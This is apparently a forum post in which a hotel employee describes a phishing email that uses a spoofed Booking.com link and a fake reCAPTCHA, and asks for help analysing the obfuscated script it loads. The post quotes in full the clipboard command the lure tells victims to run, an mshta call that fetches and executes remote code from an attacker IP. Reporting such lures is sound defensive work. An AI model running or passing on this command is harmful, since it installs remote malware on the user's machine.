My hotel email recently got an interesting phishing attempt. It contained a link spoofed to look like a genuine Booking.com link. When loading the site, a fake reCaptcha box loads with instructions to open the Run program on Windows, hit CTRL+V, and hit enter. The clipboard is loaded with this command:
mshta http://185.147.124.40/Capcha.html # ✅ ''I am not a robot - reCAPTCHA Verification ID: 3781''
I thought this was an interesting attack. The real interesting thing, though, is the script loaded in on the IP's "Capcha.html" file, which I've put in an (unlisted) pastebin here.
I can recognize this is obfuscated code, but I have no idea how to crack this any further. Also, I feel like having an unshielded IP address is kind of a liability, no?